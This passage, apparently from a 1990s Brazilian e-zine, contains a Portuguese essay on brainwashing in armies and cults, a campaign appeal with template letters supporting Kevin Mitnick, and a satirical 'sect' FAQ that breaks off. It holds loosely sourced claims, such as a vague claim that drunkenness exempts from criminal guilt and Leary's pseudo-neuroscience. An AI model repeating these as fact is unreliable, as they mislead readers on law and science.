ou de campones, de vigilante defensor da democracia ou de intelectual avancado, de piedoso ou de extremado protestante; vai ao campo e αs escolas, αs fabricas e αs igrejas, α catedra e α magistratura; usara, se necessario, o uniforme ou o traje civil; enfim, desempenhara qualquer papel que considerar conveniente para enganar, mentir e conquistar a boa-fe dos povos ocidentais"(5) E' um filme movimentado. O motivo central para se acreditar, para se entender a coisa toda, e um lance que parece realmente historia de cinema e no entanto, ja foi comprovada na vida, chamada lavagem cerebral. O termo foi criado mais ou menos na epoca da Guerra da Coreia, quando se constatou varios casos de militares norte-americanos que colaboraram com o inimigo, chegando mesmo ao ponto de virarem a casaca e nao quererem mais voltar para casa, quando a guerra acabou. Uma coisa meio assustadora, quando se pensa nisso. Ha quem duvide. A coisa ficou meio no esquecimento, ate que vieram os 60 e 70. Houve o caso Patricia Hearst, que ate ja virou filme, a historia de uma estudante (filha de um super-empresario da imprensa americana, o Chato de la, que tambem foi retratado no filme "Cidadao Kane" altamente recomendavel). Essa menina estava noiva, ia se casar, foi sequetrada por um grupo de guerrilha urbana, chamado Exercito Simbiones de Libertacao. Alguns meses depois, a "patricinha" apareceu em todos os jornais, nao mais como vitima, mas como nova integrante do tal "exercito". Como se explica tal metamorfose, de "loira burra" a guerrilheira urbana? Ou como seu pai disse, na epoca: "Nos a tivemos durante vinte anos. Eles a tem ha apenas 60 dias. Nao acredito que possa ter mudado sua filosofia tao rapidamente - e muito menos para sempre". . Aqueles que assistiram o filme "Nascido para Matar" tem uma ideia do que o processo de pegar um individuo qualquer e transforma-lo numa maquina de guerra. Nao basta colocar uma arma na mao de um sujeito. Como e que voce pode pegar um sujeito qualquer, forca-lo a deixar a convivencia da sua familia, ir morar num local junto com sei la quantos, acabar com a liberdade dele, etc, e ainda esperar que esse cara va arriscar a propria vida para que voce fique seguro em sua casa, seu trabalho, etc.. Pior ainda, como esperar que ele nao se revolte e mate o superior dele? Elementar, voce cria um programa de treinamento chamado Servico Militar. Quem participa constata que, depois de alguns meses, ate se acostuma e depois inclusive acha graca na vida de militar. Ja vi muitos terem orgulho de ter participado, mesmo lembrando que antes nao queriam coisa alguma la dentro. Coisa estranha, a pessoa mudar assim da agua pro vinho.. acontece. Mas nao e so o Exercito que consegue transformar a pessoa. Alguns cultos religiosos tambem sao acusados de tais praticas, de reduzir seus seguidores a meros robos, capazes inclusive de matar, como mostra o caso de Lynete (vide mais adiante) que tentou anos atras matar o entao presidente Gerald Ford ou o caso doa seita Ensino da Verdade Suprema, criada pelo guru Shoko Asahara e que causou um atentado terrorista com gas Sarin, no metro de Toquio, em marco de 95. O melhor porem e pegar um texto que explica um pouco mais, como funciona nossa cabeca, nesses casos. Com a palavra, Timothy Leary: (...) Entre sua detencao por apontar uma arma contra Gerald Ford, em setembro, de 1975, e sua condenacao, em novembro deste ano , Lynette "Squeaky" Fromme nao fez nada para ajudar sua defesa e fez de tudo para divulgar a filosofia de Charles Mason - o cabeca do grupo que em agosto de 1969 chacinou a atriz Sharon Tate e mais tres pessoas com requintes de extrema crueldade. Lynette se orgulhava de ter sido a primeira mulher a ser admitida na "familia" Mason, de quem recebera uma intensa lavagem cerebral. E , durante o julgamento, nao houve palavra do juiz ou mesmo do seu proprio advogado que a fizesse se dar conta de sua situacao legal. O que lhr interessava era tao somente o fato de ter atraido a atencao dos meios de divulgacao para propagar a ideologia de Mason * * * * * Nao nada que indique nenhuma fraqueza especial por parte de Patty, Rusty ou Squeaky. Os tres eram americanos bastante normais ate que penetraram nos ambientes do Exercito Simbiones de Libertacao, do Exercito americano e da familia Mason, respectivamente. E e essa a primeira licao que temos que aprender: a lavagem cerebral, como a malaria, e uma doenca que se pega por contagio. Claro, o conceito de "lavagem cerebral", nada tem de cientifico. Afinal, o cerebro nao e uma coisa suja, que possa ser lavada, mas sim um computador bio-eletrico, com mais de trinta bilh⌡es de celulas nervosas capazes de realizar 102 783 000 interconex⌡es, numero esse superior ao total de estrede estrelas do universo. Tanto quanto o sistema nervoso e o resto do nosso corpo , o cerebro e projetado e programado pelo codigo genetico : somos formados por DNA para produzir mais DNA. Em outras palavras, por mais que isso choque os teologos e os humanistas, somos todos robos neurogenicos, uma condicao da qual nao poderemos escapar enquanto nao aprendermos a dominar o nosso sistema nervoso de forma a reprogramar nossos destinos. Um exemplo da progrmacao cerebral foi levantado a partir de uma girafa recem-nascida cuja mae foi abatida por um cacador. A girafinha -de acordo com sua programacao genetica - se fixou no primeiro objeto que se movia ao seu redor, o jipe do cacador, seguindo-o, tentando mamar nele - isto e, identificando-o com a sua mae. Essa mesma fixacao - ou imprint - a um objeto externo tambem acontece com seres humanos. No caso em quatro etapas. 1. O circuito de bio-sobrevivencia infantil, ou consciencia, que lida com os sinais de perigo-e-seguranca. 2. O circuito da crianca mais velha, ou ego, ligado ao movimento e a emocao. 3. O circuito simbolico-verbal do estudante, ou mente relacionado com a linguagem e o conhecimento. 4. O circuito socio-sexual do adulto, ou personalidade, ligado, ou personalidade, ligado ao comportamento. Esses quatro circuitos sao os quatro "cerebros" cujos os conteudos sao progressivamente apagados e reimpressos durante o processo mecanicamente simples da lavagem cerebral. O primeiro circuito, ou cerebro da bio-sobrevivencia, e ativado assim que se nasce. Sua funcao e a de buscar alimento, ar, calor e conforto, rejeitando o que quer que signifique perigo, impureza, ameaca. Esse trabalho e centrado em torno da presenca da mae - ou de qualquer coisa que venha a substitui-la., como o caso da girafinha. Durante toda a vida, quando o cerebro da bio-sobrevivencia detecta perigo, todas as demais atividades mentais cessam. Esse conceito e fundamental para a programacao cerebral. Para que se crie um novo imprint, e preciso, inicialmente, reduzir-se o paciente a um estado infantil, isto e, vulneravel em seu primeiro cerebro. Nesse processo, o paso incial consiste no isolamento da vitima, de preferencia num ambiente pequeno onde nao atuem as tecnicas mentais que originalmente cuidavam da sobrevivencia do recluso. Na verdade bastam poucas horas ate que a ansiedade se manifeste no detido, e so alguns dias para que surjam as alucinac⌡es, um sinal claro de que a vitima esta pronta para receber o imprint de um novo objeto maternal. Para um prisioneiro humano. Qualquer bipede que lhe trouxer comida sera aceito como uma nova mae. No caso do filme "Teoria da Conspiracao", do qual falamos no inicio do artigo, a coisa vai um pouco mais alem, que e onde comeca a ficar realmente inacreditavel, principalmente por quem nao teve acesso ao tipo de informac⌡es que a imprensa trouxe ao publico, durante o tempo em que nosso pais se encontrava sob censura. Por outro lado, com tanta informacao disponivel, nao e um assunto em voga hoje, como ja foi em outras epocas. Um livro que ajuda a entender melhor o filme (nao vou contar, obvio) e "A Programacao de Candy Jones" de Donald Bain. Nele, a coisa e um pouco mais assustadora. A CIA teria criado um programa de estudos com drogras alteradoras da mente, com o intuito de verificar seu potencial para manipular pessoas. Isso e um fato, nao e ficcao. Quando um sujeito, que recebeu LSD sem ser avisado, pulou do alto de um predio, a coisa veio a publico e em 1973, todo o material que tinha sido produzido foi destruido. Mas veja como a coisa pode ser complexa: todo mundo que ja saiu pelos "bares da vida" tem alguma historia de bebado pra contar. Quer um exemplo maior, pensem na historia da finada Re Bordosa, personagem do Angeli. Basicamente uma mulher que bebia alguns copos de bebida e acordava no dia seguinte na banheira, sem saber o que tinha feito. Na vida real, ha pessoas sob acao do alcool que funcionam desse jeito. Bebem, sofrem uma metamorfose total e depois quando acordam, nao se lembram mais. Amnesia (e ressaca). So pra se ter uma ideia, no codigo penal (ou processo penal, eu li, ta num desses dois) ta la uma legislacao qualquer que "exime de culpa o crime cometido sob influencia do alcool". Nao sei ate que ponto funciona, e bom procurar um advogado pra checar isso, faz algum tempo que li e nao sou expert no assunto. Pelo menos o que li seria que assim como "razao de insanidade", "embriagues" poderia em casos bem especificos, inocentar a pessoa. Claro que a ideia da CIA nao era de embebedar o cara e mandar bancar o James Bond por ai. Nao. No livro que mencionei acima, a ideia era pegar um cidadao especifico, no caso foi usada como cobaia uma radialista americana, uma Leila Cordeiro ou Bruna Lombardi, sei la (traduzindo aquela epoca pra hoje) que era bastante suscetivel a hipnotismo e que tinha tido episodios de mudanca de personalidade na infancia. Atraves do uso de drogas especificas, uma sub-secao da CIA trabalhou com essa mulher e .. conseguiu fazer aparecer as personalidades "adormecidas" no fundo da cabeca dela. No final de cada sessao de "terapia", mandavam ela se esquecer de tudo. Olha a vantagem da coisa: ja foi super explorado no cinema a historia de pessoas com multiplas personalidades. Agora imagina uma pessoa que alterna uma personalidade completamente inocente do mundo, tipo loira burra, com a de uma agente secreto treinado para desempenhar miss⌡es. Pois e, cada sessao, dopavam a mulher de forma a aparecer aquela personalidade que era mais agressiva, menos carinhosa, mais desumana, bem tipo mae de namorada quando vira "sogra". E' , isso parece coisa de historia em quadrinhos. Ate hoje nao tenho muita certeza se acredito, mesmo o livro mostrando fotos e documentos sobre como a coisa aconteceu. (Tem ate uma bibliografia na rede, como por exemplo: Martin A.Lee, Bruce Shlain ACID DREAMS -- The Complete Social History of LSD: The CIA, the Sixties, and Beyond) . Ai outro dia li uns papeis na rede sobre cultos que praticam a lavagem cerebral e o fato e que a grande maioria dos jovens que passam por uma coisa dessas, tambem nao acreditam que o que aconteceu com eles foi uma coisa malefica ou que era uma experiencia pela qual eles nao queriam passar. Na verdade, existe um trabalho cientifico, feito com estudantes e gente comum, la nos EUA, foi ate publicado no Brasil, sobre essa questao de como e facil convencer alguem a seguir ordens inclusive ordens que signifiquem a morte de outra pessoa, se um "motivo correto" for apresentado. Chamaram duas equipes de estudantes, uma, que sabia o que estava sendo feito, era composta de gente de arte dramatica. A outra, gente escolhida mais ou menos aleatoriamente. O cara entrava numa sala e via um interruptor que dava choques em uma pessoa do outro lado de uma parede de vidro espelhado, tipo oculos ray-ban. O estudante recebia a ordem de dar choques na "vitima", de acordo com as ordens do "professor". A ideia era ver ate ponto o estudante aceitava continuar eletrocutando a "vitima" (que era estudante de arte dramatica e nao sofria porcaria nenhuma, so fingia e implorava pra nao continuarem os choques). Se o estudante protestava, o "professor" insistia que era necessario aumentar a dose do choque. Varios continuaram com a experiencia ate "matarem" a vitima. Poucos, bem poucos, se revoltaram e decidiram nao continuar e por assim dizer, fizeram algo proximo de mandar o "professor" α merda. Voltando ao Timothy Leary: "O trabalho de lavagem cerebral e relativamente simples, consistindo basicamente na troca de alguns circuitos roboticos por outros. Assim que a vitima passa a encarar o reprogramador como a crianca encara seus pais - fornecedores de seguranca vital e de apoio para o ego - qualquer nova ideologia pode ser inculcada no cerebro." "Durante o estagio de vulnerabilidade, qualquer pessoa pode ser convertida a qualquer sistema de valores. Facilmente podemos ser induzidos a entoar "Hare Krishna, Hare Krishna" como "Jesus morreu por nos", ou a bradar "abaixo o Vaticano", aceitando plenamente as ideologias que estao por tras desses temas. O passo seguinte, na lavagem cerebral, consistira em nos convencer de que qualquer pessoa que nao partilhe dos nossos novos valores sera sempre debil, estupida ou louca". "Para reforcar os valores da nova realidade recem-incorporada, e preciso que haja uma realimentacao das novas coordenadas que nos estao sendo impostas. A grande ironia e que o nosso conceito de realidade e tao fragil que pode se desfazer em apenas alguns dias, caso nao tenhamos constantes mensagens que nos reafirmem quem somos e que a nossa realidade continua existindo". "Bem a proposito, o Exercito constroi uma "ilha" totalmente militarizada para os seus efetivos. E ilhas similares sao erigidas por qualquer outro movimento que implique numa lavagem cerebral, seja ele politico, mistico ou esoterico." No exercito, a preocupacao, ao contrario do que possa parecer num filme de Rambo, nao e ensinar a matar, nem a sobreviver na selva, muito menos lavar as latrinas. Isso e consequencia. A preocupacao basica, razao de ser do militar e defender a patria e os cidadaos. Para isso, ele precisa aprender a cumprir ordens. Ai e que mora o perigo. Tudo e feito para que o "reco" (soldado e so depois do treinamento basico) nao precise pensar, so obedecer. Tem muito filme por ai, alguns ate folcloricos (o diretor contando a maravilha do servico militar no tempo dele) sobre esse lance entao nem vou comentar muito. Hoje em dia, o exercito brasileiro nao representa o mesmo perigo que representava na minha juventude, quando tinha pais que chegavam no dia do exame medico do filho e insistiam para que ele fosse escolhido para servir. So quem faz medicina e que ta obrigado a fazer sem chance de escapar com facilidade. Mais facil de acontecer e cair numa seita mistica. Sao muitas as raz⌡es para isso. O sujeito vai estudar ou trabalhar fora, longe da cidade dele. Nao conhece ninguem. Uma seita mistica e uma forma de se enturmar, conhecer gente interessante. De repente, e um universo diferente, onde tudo parece ser mais facil. Ninguem fala em morte, assalto, falta de dinheiro. Fala-se apenas em fe e falta de fe. E o mais incrivel, sao pessoas que escutam quando voce tem um problema, ajudam ou tentam te ajudar quando voce esta sem grana. Claro, tem alguns principios que voce tem que aceitar. Dormir, por exemplo, nao pode. Fechou os olhos um pouquinho, tem que escutar "ate quando, dorminhoco, vais continuar dormindo, isso esta aqui na Biblia, vai negar a palavra de Deus, esta perdendo a fe?". Tambem nao pode conversar em outra coisa que nao seja a palavra de Deus, a salvacao, a possibilidade de um dia ser elevado a condicao de chefe de grupo (coisa que nunca acontece) e .. arrumar algumas contribuic⌡es para engrandecer o trabalho de Deus aqui na Terra, trabalhando tanto para mostrar a devocao como para preparar o espirito para o apocalipse, onde so os dignos serao salvos. Claro, masturbacao e pecado. A propria pessoa fica com vergonha de tocar o proprio corpo. Homens so conversam com homens e mulheres so conversam com mulheres. Conversei com ex-convertidos. Um pessoal legal. Um deles me entregou um livro chamado: "Os guerreiros da virgem" de Jose Antonio Pedriali. Conta toda essa trajetoria de um rapaz que achava que sua missao na Terra era salvar o mundo do diabo. Deve ser algo irresistivel, ir atras da salvacao do mundo. Tem um outro livro que esta proibido, mas volta e meia recebo noticia dele existindo na internet, escrito por um pastor de uma igreja ai: "Os Bastidores do Reino". No http://www.clark.net/pub/times9/brainwsh.html tem algumas das tecnicas usadas. O resultado pode ser devastador.(ver tambem http://www.inlink.com/~dhchase/books2.htm). Um amigo me contou, num email, muito tempo atras, sob o trabalho de um culto mistico na cidade dele. Primeiro, apareceram uns caras com ideias de bate-papos religiosos e esotericos, andando vestidos de forma bem austera e nao ficavam nem bebendo nem jogando. Os pais de familia nao falam nada contra, nem tem porque, no inicio. A mudanca parece ate boa, nao parece que o garoto esta mexendo com drogas, parou de ouvir musica alta, nao pede mais o carro emprestado. Fica so curtindo religiao. Ai o comodismo comeca a se transformar em duvida. "Sera que meu filho vai virar padre?" So quando finalmente toma coragem e chama o filho para a conversa, descobre que e ouvido. E nao tem problema. Acha que o culto ta amadurecendo o cara. A mae nem reconhece mais. Ai chega o ponto em que o culto comeca a avisar o novo membro que a familia esta influenciada pelo demonio e e necessario morar um tempo fora, mais perto da fe que ele esta abracando, para aprender a se defender. Afinal de contas, muitas cabecas juntas oram pela salvacao bem melhor do que uma. La na sede, batalharao por um mundo livre de mas influencias. Os caras que saem da cidade desse jeito, disse meu amigo, nenhum volta. Um, porque e uma aventura sair da cidade onde se morou a vida e toda. Outra, porque voltar e sempre mais dificil. Lendo pela rede vi uns papers assustadores. A pessoa demora a se acostumar com a ideia de que dedicou tanto sentimento e louvor a toa.. Existem alguns cultos que contam com grupos de auto-ajuda, semelhantes a Alcoolicos Anonimos, para dar apoio moral aos que estao dando o dificil passo de cair fora de uma coisa que ja deu o que tinha que dar. Tem que ter ajuda senao o cara volta, porque o vazio emocional e muito grande. Ai ja nao e mais de querer ter fe, e de nao saber ter vida fora do culto. A vitima precisa passar por um processo de de programacao em que TUDO na vida tem que ser revisto. Nem todo mundo consegue se libertar da ideia de que o mundo nao e cor-de-rosa. Vi um filme na TV em que a familia teve que contratar um cara pra sequestrar e iniciar o processo de "abrir a cabeca do garoto". Na vida real, o que normalmente acontece nesses grupos de ajuda e que a familia consegue convencer o sujeito a ir em um territorio neutro e um ex-praticante do culto fica horas e horas revelando os podres que o outro ainda nao consegue ver. Acredito que esse tipo de coisa ate funcione. Ja vi um crente conversar horas com um bebado defendendo seu culto. Se pudesse conversar com alguem que ja passou por todo o processo e pulou a cerca pra fora, talvez tenha efeito. O mais incrivel e que as pessoas nao fazem propaganda disso. Medo de represalias. O mundo moderno esta ficando muito assustador, impessoal. No Japao, onde aconteceu aquele caso da tal seita, esses cultos novos representam uma forma de vida alternativa. Todo ano, 1400 cultos aparecem. E 1400 cultos tambem desaparecem. Gente que sai de uma seita que oferece a salvacao e vai para outra seita de salvacao. Salvacao, no caso, e porque a maioria delas prega que o mundo vai acabar e que so os "escolhidos" daquela seita especifica, serao salvos. A coisa la (e talvez nao so la, na California, EUA, tem seita pregando ate que o mundo foi feito por computadores) esta chegando talvez nesse ponto da historinha abaixo: Joe Existencial tava experimentando outras de suas crises intelectuais: - Puxa, eu simplesmente nao sei em que acreditar.. Ai chega o cara pra ele, cheio de livros: - Po, Joe! Sem grilo. Todas essas confus⌡es e duvidas internas estao magicamente resolvidas gracas a minha empresa "Crenca Comigo". YEEEEeeeees! Praque gastar anos e anos pastando pelo processo de pesquisa e pensamento dos topicos por voce mesmo. Simplesmente escolha qualquer um dos nossos sistemas pre-racionalizados de crenca e entao conforme-se a ele para o resto da vida!! - E mais! Sem custo adicional, nos mostramos a voce como evitar deixar que novos "fatos" entrem na sua cabeca, assegurando entao que nada atrapalhe sua recem-descoberta ilusao de seguranca mental. Joe entao pensa um pouco: - Mas, mas, e se minhas crencas estiverem erradas?? O carinha responde: - Esta e a beleza da coisa, homem. Voce seria o ultimo a saber. Mesmo, MESMO, se estivessem erradas ... Moral da historinha: "Ah, o cerebro humano funciona que e uma beleeeeza". (Historinha retirada de uma tira chamada Twisted Image - Ace Backwords) Lavagem Cerebral nao e apenas um conceito usado para definir tais extremas mudancas de comportamento. O proprio processo de evolucao de uma pessoa ao longo da vida e uma lavagem cerebral. Quando se torna adolescente, tem brincadeiras que se abandona, porque "sao coisas de crianca". Quando se vira adulto, se abandona "coisas de adolescente rebelde". Quando se casa, se abandona "habitos de solteiro irresponsavel". Ninguem sabe porque, mas para voce participar de um novo grupo, classe social ou mesmo viver com gente de outro estado que nao o seu tem que adotar novos codigos de conduta que nao sao os nossos. Um exemplo muito bom esta ilustrado no filme "o homem que virou suco", relatando a historia de um nordestino que foi engolido pela cidade grande, na verdade um cronica social comentando o fato de que o sujeito que emigra para Sao Paulo, tem que esvaziar a bagagem de toda uma cultura riquissima de comportamento e absorver outra, completamente estranha e diferente, onde valentia e solidariedade, por exemplo, contam menos. Recentemente saiu uma materia na TV comentando que tem agencia de empregos que so contrata empregada domestica se for de Minas Gerais ou interior de Sao Paulo. Nordeste, so se for de determinada religiao. As pessoas nao param pra pensar nisso, mas cada revolucao e uma nova "lavagem cerebral". Quando houve a tal revolucao sexual que nao foi nada mais nada menos de se poder falar em namorar uma mulher sem intencao de casar, isso foi dificil para muita gente. Quando aconteceu a Aids, foi bem mais dificil ainda. Muito adolescente nao queria acreditar que na vez dele, o sexo estava de novo, proibido. Ou restrito. Para as mulheres, foi legal, porque antes da revolucao sexual nao podiam transar a nao ser com os maridos. Por outro lado, depois o dificil era casar. Com a Aids, elas puderam voltar a pensar em casamento e nao sustentar a coisa so com sexo. E' algo a se pensar. Atualmente a pessoa e obrigada a administrar essa "lavagem cerebral", que e acompanhar o mundo a sua volta. Antes que uma nova revolucao ocorra, a pessoa ja tem que se preparar para uma futura adaptacao e ja nao estou falando mais de sexo ou de novo tipo de computador. So que o nome virou "reciclagem". A pessoa precisa ter um tempo para parar e absorver todos os habitos novos que estao rolando. A parte mais chata e que e dificil resistir a esse tipo de coisa. Tem gente que so conversa realmente quando esta na frente de um computador, atraves do CHAT ou TALK. Ha alguns anos atras, quem comprou videogame pros filhos ficou condenado a nao entender uma parte do universo deles. Se voce nao tem um assunto em comum, nao tem dialogo. Fica dificil ate fazer parte de um grupo. O pior e que novos grupos surgem, com novas opc⌡es de dialogo. E' dificil, mas cada um precisa parar e pensar da mesma forma que assume um personagem no universo virtual, qual personagem no universo real ela consegue viver. (1) General Belfort Bethlem, comandante (na epoca) do 3o Exercito, depois Ministro do Exercito - Jornal O Estado de Sao Paulo, 3.7.1977 p.35 (2) General Milton Tavares de Souza, Jornal do Brasil 3.10.1976 p.30 (3) Tenente-Coronel Carlos de Oliveira, Jornal do Brasil, 19.11.1975 (4) Deputado Jose Bonifacio, lider do governo jornal Folha de Sao Paulo, 22.5.1977 (4) General Borges Fortes na epoca chefe do Estado Maior do Exercito brasileiro, Jornal O Estado de Sao Paulo, 9.9.1973 p.18 JUSTICA J┴! Em 06 de agosto de 1996 iniciamos nossa campanha na Internet exigindo um julgamento e uma sentenca justa para Kevin Mitnick e condicoes carcerarias saudaveis, haja vista todo o historico de violacoes e maus tratos sofridos pelo mesmo em situacoes anteriores. Durante todo este tempo temos acompanhado de perto a luta deste homem pela sua liberdade. Tivemos a oportunidade de conhecer sua familia, mae e avo, e partilhar do sofrimento destas pessoas diariamente. E partilhar da coragem que move todas as maes e avos do mundo, que sao privadas da companhia dos seus familiares mais queridos. Acompanhamos as primeiras audiencias onde Kevin era levado ao tribunal algemado e acorrentado como um prisioneiro de alta periculosidade nao sendo-lhe permitido usar trajes civis; Acompanhamos a pratica da tortura sutil, de efeito devastador a longo prazo, onde os maus tratos evidenciam-se na ameaca velada da solitaria, na falta do banho diario provocador de erupcoes cutaneas, na devolucao de nossas correspondencias a fim de isolar o prisioneiro , todas promulgadas a fim de obter o desespero e o cansaco fisico e emocional do prisioneiro; Acompanhamos o desespero de sua mae e sua avo que colocaram suas casas a disposicao da Justica para obter a garantia necessaria para a fianca e a recusa da mesma; Temos acompanhado este processo injusto onde Kevin Mitnick foi eleito bode expiatorio do Governo Americano sem a minima condicao de justica. Nos nao sabiamos quando iniciamos nossa campanha, que Kevin Mitnick ja havia sido julgado e sentenciado por seus algozes, notadamente o promotor David Schindler que insiste em manipular, de forma arbitraria, as questoes juridicas e legais pertinentes ao caso, para justificar o "circo" em que se transformou esta legitima "fogueira de vaidades". Acompanhamos o desvendar das contradicoes promovidas pelos agentes da condicional onde estava em jogo mais uma sentenca absurda para Kevin Mitnick. Acompanhamos., outrossim, as humilhacoes e maus tratos que Kevin tem sofrido ao longo deste processo,onde ate seus pertences pessoais, documentos, livros, oculos e roupas foram "confiscados"em dezembro ultimo quando o mesmo foi colocado na solitaria sob alegacoes as mais variadas, indo da hilariante caca αs sardinhas ate a inusitada transformacao de um walk-man num microfone secreto. Na verdade o que configurou-se aqui foi mesmo o roubo dos pertences de Kevin onde, supunham eles, encontrariam a linha de defesa estudada por Mitnick. Forjam-se acusacoes e situacoes para condenar de qualquer maneira o mito Kevin Mitnick e manter o circo armado. Acompanhamos as manobras maquiavelicas praticadas pelos algozes de Kevin Mitnick usando a midia e a falta de informacao da populacao em geral , disseminando a ideia de que hackers sao criminosos perigosos e merecem o desprezo da populacao. Acompanhamos as sentencas injustas que tem sido perpetradas contra Kevin Mitnick neste julgamento absurdo onde so existem agravantes e onde se paga duas vezes pelo mesmo erro numa solapacao clara e vergonhosa da Lei. Acompanhamos estupefatos o silencio da sociedade americana diante desta clara afronta`a sua Constituicao. E α terrivel perspectiva de que, num futuro proximo, qualquer cidadao informatizado do planeta seja um serio candidato a ter sua vida devassada e sua liberdade ameacada por qualquer Governo arbitrario que ai estabelaca sua relacao de poder. A historia tem nos mostrado ao longo do tempo que a autoridade que nao se baseia na justica degenera em tirania. Hackers jamais deixarao de existir conquanto sua etica original , a busca do conhecimento, seja um dos atributos mais facilmente encontrados na raca humana. E' preciso saber conviver com este fato na sua complexidade e viabilizar a questao produtivamente ,como ja esta sendo feito em alguns paises europeus, aproveitando este conhecimento e nao extinguindo-o. Kevin Mitnick e um hacker sim. Um purista. Mas nao eh um rotulo. E' um ser humano com passado ,um presente, e nele existem pai , mae, familia, amigos, amores,valores , pessoas e sentimentos..Mas e preciso haver um futuro e este tera que ser construido por todos nos. Pelos que fazem as leis, pelos que executam as leis. Nao podemos mais incorrer em erros historicos que venham a desencadear distorcoes e abusos onde o ser humano mais uma vez ira sofrer a ira dos tiranos e o descaso dos ignorantes. Temos recebido manifestacoes de todas as partes do mundo apoiando nossa campanha. Tivemos a pagina acessada por dezenas de ONGs, universidades, pessoas das mais diversas nacionalidades . Acompanhamos tranquilos a devassa feita pela Pac Bell(Pacific Bell) na nossa provedora e a devassa de meu e-mail , numa tentativa inutil de intimidacao e afronta. Temos tido tambem momentos da mais absoluta generosidade onde ate um emprego on- line para Kevin Mitnick foi oferecido por uma empresa de informatica . Nao era do conhecimento desta empresa o fato de que Kevin Mitnick foi condenado a ficar por 3 anos longe de qualquer aparelho eletronico, telefone, etc...tirando-lhe toda e qualquer oportunidade de refazer sua vida e trabalhar. -Declaracao Universal dos Direitos doHomem - Artigo XXIII. 1. Todo homem tem direito ao trabalho, α livre escolha de emprego, a condicoes justas e favoraveis de trabalho e α protecao contra o desemprego. Kevin Mitnick esta sendo condenado aqui duas vezes pelo mesmo erro.Onde esta o cumprimento da lei justa? Na defesa da lei espera-se a aplicabilidade da pena infalivel, nao a perversa. E acompanhando este bizarro quadro que se apresenta acompanhamos estupefatos e indignados a "proposta indecente" de acordo feita pelo Governo Americano no comeco do ano, onde Kevin Mitnick, entre outras coisas, teria que abrir mao pelo resto de sua vida de usufruir qualquer tipo de beneficios(direitos autorais entre outros) com a sua propria historia. Definitivamente isto nao e um julgamento. ╦ uma perseguicao. E uma vergonha para todos nos. Kevin Mitnick esta doente. Este quadro tem se repetido ao longo do ano. A desesperanca e o peso da injustica tem sido insuportaveis para Kevin e sua familia. Kevin Mitnick esta sendo assassinado lentamente por este sistema devorador que precisa de bodes expiatorios para sobreviver Σ propria iniquidade. Nos choramos com ele e por ele. Mas nao vamos desistir.. Nos APELAMOS A TODOS OS FUCADORES E AFICCIONADOS DE MICRO para que saiam de suas ilhas e que unam-se a nos neste momento crucial . E' um momento para uniao e demonstracao de forca. Refletir e agir. O computer underground tem sua propria rede e esta na hora de faze-la funcionar em beneficio de todos. A omissao , e a consequente condenacao de Kevin Mitnick, podera estabelecer a INJUSTICA como prerrogativa em qualquer processo futuro . APELAMOS A TODOS para que se manifestem e ENVIEM suas cartas durante os meses de DEZEMBRO E JANEIRO, exigindo que Kevin Mitnick tenha um julgamento e uma sentenca justa e que seja colocado em LIBERDADE CONDICIONAL ate o termino deste julgamento . Importante lembrar que as cartas enviadas do Brasil levam 15 dias para serem entregues nos EUA. Nao podemos perder tempo. Mande quantas cartas puder ate o final de janeiro, para que haja uma centralizacao deste envio.O apelo devera ser enviado α EXMA.JUIZA MARIANNA PFAELZER.( voce encontra a carta pronta para impressao no topico seguinte). Basta assinar e remeter. MUITAS CARTAS DEVEM SER ENVIADAS para uma demonstracao publica efetiva e macica do desejo de que a Declaracao Universal dos Direitos do Homem seja uma realidade em movimento e que Kevin Mitnick consiga, junto de sua familia, tratamento medico adequado e onde possa exercitar seus direitos em plena igualdade,em conformidade com a Lei, assegurando-se desta forma as garantias necessarias α uma defesa ampla e justa. Nossa luta agora e contra o tempo, a favor da vida. JUSTICA J┴! SUPPORT KEVIN CAMPAIGN Fernanda Serpa e colegas Modelos de Carta para a Campanha (em portugues e em ingles): --------------------------------------------------------------------------- JUDGE MARIANNA PFAELZER 312 North Spring Street U.S. Courthouse Los Angeles, CA 90012-4706 Prezada Senhora, APELAMOS a Vossa Excelencia para que conceda LIBERDADE CONDICIONAL para o Sr. KEVIN DAVID MITNICK, detido no Metropolitan Detention Center, em Los Angeles,California, a fim de que o mesmo possa exercitar seus DIREITOS EM PLENA IGUALDADE, EM CONFORMIDADE COM A LEI, assegurando-se desta forma as garantias necessarias α uma DEFESA AMPLA E JUSTA. Atenciosamente, _____________________________________________ Assinatura --------------------------------------------------------------------------- JUDGE MARIANNA PFAELZER 312 North Spring Street U.S. Courthouse Los Angeles, CA 90012-4706 Your Honor: I do hereby appeal to you to grant PROBATION to Mr. KEVIN DAVID MITNICK, detained at the Metropolitan Detention Center, in Los Angeles, California, so that he be able to EXERCISE HIS RIGHTS IN FULL EQUALITY, PURSUANT TO THE LAW, thus assuring him the necessary safeguards to a BROAD AND FAIR DEFENSE. Sincerely, (signature) A alternativa aos bate-papos evangelicos [Image] Nos acreditamos que o mundo so' pode ser salvo atraves de um planejamento detalhado feito atraves de amplo debate envolvendo todas as classes sociais juntas, sacralizadas numa mesa de bar, numa cerimonia de alto ou baixo astral, unidas atraves da sagrada bebida. Venha discutir a salvacao do Brasil, a vitoria final e incondicional do Ismo e suas variantes (Anarquismo, Capitalismo, Comunismo, Gayismo, etc), a BIP (vulgo Busca Insaciavel do Prazer) e a danacao em suas varias formas (falta de grana, mulher, objetivo, emprego, etc) e o nao menos importante dia do juizo final (aquele em que finalmente algo acontecera'para nos tirar desse marasmo que nos assola o tempo todo), entoando todos aqueles hinos sagrados da MPB e Bossa Nova ou qualquer outro ritmo (incluindo o nosso hino "A volta do Boemio"). Requisitos: Essencial saber falar da boca pra fora e tambem jogar conversa fora. Horario: Qualquer dia, qualquer hora, a gente se encontra.. Local: Seja onde for.. PERGUNTA MAIS FREQUENTES DOS NOVOS AC╙LITOS:: Pergunta: Qual e a grande pergunta? Resposta: A grande pergunta e aquela mesmo que todos nos sabemos qual e'. O mais importante na grande pergunta e' a resposta, que nao convence absolutamente ninguem ou simplesmente esta'alem da nossa capacidade de compreensao. Pergunta: Porque a necessidade de uma discussao tao grande para se chegar a salvacao do mundo? Resposta: Isso esta' claramente descrito no livro do Ignorante, no paragrafo relativo ao discurso do Franco, ou como dizem os eruditos do assunto, a chamada lei do chato: "Nao basta encher o saco ate' o pescoco. Tem que estourar a boca do balao. So' entao havera' a luz e nos nos perguntaremos: Porque estou perdendo meu tempo aqui?" Pergunta: Nessas reunioes, os participantes tem que assumir suas culpas e confessar suas faltas? Resposta: Na OPUS-NIGHT, ninguem assume nada, no maximo confessa que faltou com sua parte na dolorosa culpa(tambem chamada de "a dolorosa"). Todo mundo aponta porem, as culpas do proximo (tambem conhecido como "o outro","aquele cara" ou "o fulano"), que esta' heroicamente presente em espirito, mas nao 